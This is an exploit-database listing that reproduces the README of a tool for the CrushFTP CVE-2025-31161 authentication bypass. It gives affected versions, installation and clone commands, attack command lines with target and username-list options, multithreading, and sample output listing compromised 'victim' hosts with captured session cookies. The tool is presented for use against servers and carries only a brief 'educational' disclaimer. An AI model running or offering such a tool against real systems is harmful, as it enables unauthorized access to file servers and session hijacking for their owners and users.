Exploit for Authentication Bypass by Primary Weakness in Crushftp CVE-2025-31161

Name: Exploit for Authentication Bypass by Primary Weakness in Crushftp CVE-2025-31161
Rating: 5 (79 reviews)
2025-04-21 | CVSS 9.8
## https://sploitus.com/exploit?id=694332D8-69D5-5366-B963-B602095A5101
# CrushFTP CVE-2025-31161 Exploit Tool 🔓
**Advanced detection and exploitation tool for CVE-2025-31161 vulnerability in vulnerable CrushFTP versions.**
-----


`CVE-2025-31161` is a critical authentication bypass vulnerability in the CrushFTP Web Interface. By manipulating the HTTP Authorization header, an unauthenticated attacker can gain full access under any valid username without supplying the correct password.

Affected Versions

CrushFTP 9.3.8

CrushFTP 9.3.9

CrushFTP 9.3.10

CrushFTP 9.3.11

CrushFTP 9.3.12

CrushFTP Enterprise versions before 9.3.12.5


## Key Features 🚀

- Automatic CrushFTP version detection and vulnerability verification
- Multi-threaded credential testing for rapid user enumeration
- Dual authentication method support (Bearer Token & Basic Auth)
- JSON report generation with session cookies
- Smart connection retry mechanisms with custom configurations
- Colorized console output with detailed logging
- Vulnerable version coverage:
  - 9.3.8 through 9.3.12.5

 ## Requirements 📋

- Python 3.8+
- Required packages:
  ```bash
  pip install requests colorama urllib3
  ```

  ## Installation 🛠️

1. Install dependencies:
  ```bash
   pip install requests colorama urllib3
   ```
2. Clone repository:
  ```bash
   git clone https://github.com/TX-One/CVE-2025-31161.git
   cd CVE-2025-31161
   python3 tx-crush.py -h
   ```

## Usage 🖥️

### Basic Command:
```
python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json
```
### Options:
```
-h, --help            show this help message and exit
  -t, --target TARGET   Target URL (e.g., https://example.com:8080)
  -u, --users USERS     File containing username list
  -o, --output OUTPUT   Output JSON file
  -T, --threads THREADS
                        Number of threads (default: 5)
  --no-ssl              Disable SSL verification
  --timeout TIMEOUT     Request timeout (default: 15)
  --retries RETRIES     Number of retries (default: 3)
  --force               Bypass version check
```
### Advanced Example:
```bash
python3 exploit.py
  -t https://vulnerable-server.com:8000
  -u ./wordlists/common_users.txt
  -o ./results/compromised.json
  -T 10
  --retries 5
  --timeout 20
```

## Output Sample 📄

```json
[
  {
    "target": "https://victim:8080",
    "user": "admin",
    "success": true,
    "method": "Bearer",
    "cookies": {"sessionID": "a1b2c3..."},
    "server_version": "CrushFTP/9.3.12"
  }
]
```
```json
[
  {
        "target": "http://victim:8080",
        "user": "admin",
        "success": false
    }
]
```
**Disclaimer:** This project is for educational and security research purposes only. Responsible usage required.